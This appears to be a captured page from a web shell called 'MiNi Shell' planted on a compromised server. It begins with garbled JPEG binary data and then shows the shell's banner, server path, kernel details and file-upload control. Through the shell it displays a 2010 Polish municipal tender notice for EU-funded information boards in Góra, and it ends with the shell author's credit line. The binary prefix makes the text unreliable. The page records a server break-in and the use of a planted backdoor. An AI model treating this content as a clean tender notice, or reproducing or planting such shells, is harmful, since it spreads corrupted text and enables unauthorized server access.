JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100907/281660-N-2010.html

<p class="kh_header"><b>Góra: Wykonanie i montaż tablic zgodnie z wytycznymi UMWD dotyczącymi informacji i promocji dla projektów pn. Zagospodarowanie pustych i zdegradowanych przestrzeni publicznych w Górze. Rewitalizacja etap I, Zagospodarowanie pustych i zdegradowanych przestrzeni publicznych w Górze. Rewitalizacja etap II oraz Modernizacja Przedszkola nr 1 w m. Góra, ul. Żeromskiego</b><br>
<b>Numer ogłoszenia: 281660 - 2010; data zamieszczenia: 07.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Góra , ul. Mickiewicza 1, 56-200 Góra, woj. dolnośląskie, tel. 065 5443644, faks 065/543-26-58.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gora.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i montaż tablic zgodnie z wytycznymi UMWD dotyczącymi informacji i promocji dla projektów pn. Zagospodarowanie pustych i zdegradowanych przestrzeni publicznych w Górze. Rewitalizacja etap I, Zagospodarowanie pustych i zdegradowanych przestrzeni publicznych w Górze. Rewitalizacja etap II oraz Modernizacja Przedszkola nr 1 w m. Góra, ul. Żeromskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i montaż tablic zgodnie z wytycznymi Urzędu Marszałkowskiego Województwa Dolnośląskiego dotyczącymi informacji i promocji dla projektów pn. Zagospodarowanie pustych i zdegradowanych przestrzeni publicznych w Górze. Rewitalizacja etap I, Zagospodarowanie pustych i zdegradowanych przestrzeni publicznych w Górze. Rewitalizacja etap II oraz Modernizacja Przedszkola nr 1 w m. Góra, ul. Żeromskiego

Zakres  przedmiotu zamówienia:
Zamówienie obejmuje wykonanie i montaż łącznie sześciu tablic wraz z konstrukcją oraz słupkami mocującymi przeznaczonymi do umieszczenia w gruncie (z zapewnieniem stabilności konstrukcji) zgodnie z wytycznymi Urzędu Marszałkowskiego Województwa Dolnośląskiego (zawartymi w Poradniku dla Beneficjenta w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 z wyłączeniem priorytetu 1.1 i 1.2, 5.1 i 5.3 oraz Priorytetu 10, dostępnym na stronie: http://dolnyslask.pl/default.aspx?docId=3759, wyciąg z poradnika stanowi załącznik nr 7 do SIWZ) dotyczącymi informacji i promocji dla projektów wyszczególnionych poniżej pn.:

1. Zagospodarowanie pustych i zdegradowanych przestrzeni publicznych w Górze. Rewitalizacja etap I (2 tablice informacyjne spełniające wymogi tablic pamiątkowych):
- Modernizacja chodników w rejonie murów  obronnych w Górze (załącznik nr 1, tablica obustronna)
- Iluminacja zabytkowego Kościoła p.w. św. Katarzyny Aleksandryjskiej w Górze (załącznik nr 2)

2. Zagospodarowanie pustych i zdegradowanych przestrzeni publicznych w Górze. Rewitalizacja etap II (3 tablice informacyjne spełniające wymogi tablic pamiątkowych):
- Modernizacja chodników w rejonie murów  obronnych w Górze (załącznik nr 3, tablica obustronna)
- Budowa parkingu przy ul. 11 Listopada w m. Góra (załącznik nr 4)
- Modernizacja oświetlenia w m. Góra (załącznik nr 5, tablica obustronna)

3. Modernizacja Przedszkola nr 1 w m. Góra, ul. Żeromskiego (1 tablica informacyjna)
    (załącznik nr 6)


Tablice powinny zawierać :
- zestawienie znaków graficznych ułożone w  sposób określony w wytycznych (logotypy dostępne są na stronie internetowej  RPO WD pod adresem: 
http://dolnyslask.pl/default.aspx?docId=3819&mId1=3580 
- hasło promocyjne dla RPO WD: Fundusze Europejskie - dla rozwoju Dolnego Śląska,
- nazwę inwestycji,
- informację o całkowitej wartości projektu,
- informację o wartości dotacji ze środków Unii Europejskiej,
- nazwę Beneficjenta,
- informację o współfinansowaniu projektu z Europejskiego Funduszu Rozwoju Regionalnego
Szczegółowe wytyczne zawarto w opisie przedmiotu zamówienia, w załącznikach i wyciągu z Poradnika dla Beneficjenta.
Tablice muszą posiadać układ i strukturę powierzchniową zgodną z wytycznymi.

Tablice należy wykonać z blachy stalowej 1,25 mm podwójnie giętej, malowanej proszkowo na kolor szary, lico tablicy wykonane drukiem offsetowym z zabezpieczeniem przed blaknięciem.
Konstrukcja stalowa, malowana proszkowo na kolor czarny, stojąca przy jednoczesnym zapewnieniu stabilności konstrukcji, wysokości słupków 370 cm, średnica 2,,, ze stali ocynkowanej, malowane proszkowo na kolor czarny.
Napisy trwałe i czytelne, czcionka ARIAL CE, kolor - nieagresywny, materiał odporny na warunki atmosferyczne.
Minimalna trwałość kolorów i materiału - 7 lat od dnia protokolarnego odbioru.
Rozmieszczenie znaków, proporcje oraz kolor czcionki wg zasad określonych w Księdze Identyfikacji Wizualnej Narodowej Strategii Spójności znajdującej się na stronie www.funduszeeuropejskie.gov.pl, zakładka Zasady promocji FE rozdział oraz na stronie www.rpo.dolnyslask.pl - zakładka Informacja i promocja oraz Poradnika dla Beneficjenta w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 z wyłączeniem priorytetu 1.1 i 1.2, 5.1 i 5.3 oraz Priorytetu 10, dostępnym na stronie: http://dolnyslask.pl/default.aspx?docId=3759, wyciąg z poradnika stanowi załącznik nr 7 do SIWZ) 

Wymiary tablic informacyjnych dla projektu Zagospodarowanie pustych i zdegradowanych przestrzeni publicznych w Górze realizowanego w dwóch etapach  należy wykonać w wymiarach 70 cm wys. x 90 cm  szer. Wzory w/w tablic powinny odpowiadać treści wg załączników nr 1,2,3,4,5. Ponadto dla zadań dotyczących modernizacji chodników dla etapu I i etapu II  oraz modernizacji oświetlenia w m. Góra tablice należy wykonać obustronnie.  
Technologia wykonanie powyższych tablic informacyjnych spełniających wymogi tablic pamiątkowych powinna umożliwiać modyfikację treści w zakresie podanych wartości: całkowitej wartości projektu, w tym wartości zadania oraz wkładu Unii Europejskiej, w tym dofinansowania zadania. Wykonawca zamówienia zmodyfikuje podane wartości bezpłatnie w ramach przedmiotu zamówienia po uzyskaniu dyspozycji i informacji od Zamawiającego. 
W ramach realizacji projektu Modernizacja Przedszkola nr 1 w m. Góra, ul. Żeromskiego należy wykonać jednostronną tablicę informacyjną o wym. 200 cm wys. x 250 cm szer. o treści wg załącznika nr 6 wraz z konstrukcją malowaną proszkową na kolor czarny oraz słupkami mocującymi przeznaczonymi do umieszczenia w gruncie, przy czym słupki do tablicy mają mieć j/w średnicę 2,,, wysokość 370 cm, malowane proszkowo na kolor czarny. Przy  umieszczeniu w gruncie należy zapewnić stabilności konstrukcji - osadzonie w fundamencie betonowym.

Wykonawca udzieli gwarancji jakości na dostarczone tablice  w wymiarze minimum 7 lat licząc od dnia protokolarnego odbioru. 
Materiały służące do wykonania przedmiotu Zamówienia powinny posiadać odpowiednie atesty
i spełnić określone normy zgodnie z powszechnie obowiązującym prawem polskim



Zakres zamówienia obejmuje zaprojektowanie przedmiotowych tablic wraz z konstrukcją i słupkami mocującymi do stojaków - zgodnie z wzorami podanymi w załącznikach oraz wytycznymi dla beneficjentów RPO WD w zakresie wypełniania obowiązków informacyjno-promocyjnych, wykonanie zaprojektowanych tablic informacyjnych, konstrukcji i słupków mocujących oraz stojaków, montaż tablic informacyjnych do konstrukcji mocujących, dostawę zmontowanych tablic, konstrukcji i słupków do miejsca realizacji inwestycji wskazanego przez Zamawiającego oraz ich osadzenie w gruncie, zapewniające stabilność konstrukcji.
UWAGA: Wykonawca odrębnie wystawia faktury za wykonane dostawy dla poszczególnych projektów, w celu poprawnego rozliczenia przez Zamawiającego środków finansowych pochodzących z Europejskiego Funduszu Rozwoju Regionalnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wartości 20 % wartości zamówienia podstawowego na zasadach opisanych w art. 67 ust.7 ustawy Prawo zamówień publicznych ( t.j. Dz. U.z 2010 r. , Nr 113, poz. 759)
Ewentualne zamówienia uzupełniające będą dotyczyły dostaw  o kodach CPV tożsamych dla zakresu zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.52.32.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie ustanowiono obowiązku wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że zrealizował co najmniej dwie dostawy  polegające na dostawie wolnostojących tablic informacyjnych lub pamiątkowych wraz z montażem, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie. Ocena spełnienia tego warunku zostanie dokonana na podstawie przedłożonego wraz z ofertą wykazu wykonanych lub wykonywanych przez wykonawcę dostaw. spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz oferty  - wg załącznika nr 8do SIWZ podpisany przez osobę umocowaną,
Zasady wykazania umocowania opisano w pkt 11.8 przedmiotowej SIWZ wraz z tabelą rozliczeniową - zał. 8a 
2)	oświadczenie o spełnianiu warunków udziału w postępowaniu, opisanych w art. 22 ust.1 ustawy Prawo zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany w umowie pod rygorem nieważności muszą być dokonane w formie pisemnej.
3.	Wykonawcy przysługuje uprawnienie do ubiegania się o wyznaczenie przez Zamawiającego nowych terminów wykonania dostaw w wypadku:
a)	Przerwania dostaw przez właściwe organy administracji rządowej lub samorządowej, lub w wyniku wykonalnego orzeczenia sądu, które to decyzje zostały wydane nie z przyczyn leżących po stronie Wykonawcy.
b)	Wystąpienia zdarzenia zewnętrznego nie dającego się przewidzieć, na które strony umowy nie mają wpływu i którego skutkom nie można było zapobiec, nawet przy zachowaniu należytej staranności, a które uniemożliwia Wykonawcy wykonanie w całości lub w części jego zobowiązań umownych, w szczególności: klęski żywiołowe i inne zdarzenia związane z działaniem siły przyrody, takie jak: trzęsienia ziemi, powódź, a także zdarzenia pozostające poza kontrolą i wolą stron umowy oraz osób, za które strony ponoszą odpowiedzialność (w tym podwykonawcy), takie jak wojna i działania wojenne, zamieszki wewnętrzne, akty terroryzmu, skażenia radioaktywne,
c)	odkrycie na Terenie, gdzie nastąpi umieszczenie konstrukcji wraz z tablicami broni, bomb, niewybuchów lub innych materiałów wybuchowych oraz przedmiotów o znaczeniu archeologicznym i historycznym,
d)	zmian przepisów prawa, mających wpływ na termin wykonania dostaw,
opóźnień w rozpoczęciu i wykonaniu dostawy, powstałych z przyczyn nie leżących po stronie Wykonawcy, których nie można było przewidzieć w chwili  zawarcia umowy, przy zachowaniu należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gora.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i  Gminy w Górze
 ul. Mickiewicza 1  56-200 Góra, 
       pokój nr 205.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2010 godzina 12:30, miejsce: Urząd Miasta i  Gminy w Górze
          ul. Mickiewicza 1  56-200 Góra, 
          w sekretariacie, pokój nr 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju
Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa
Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com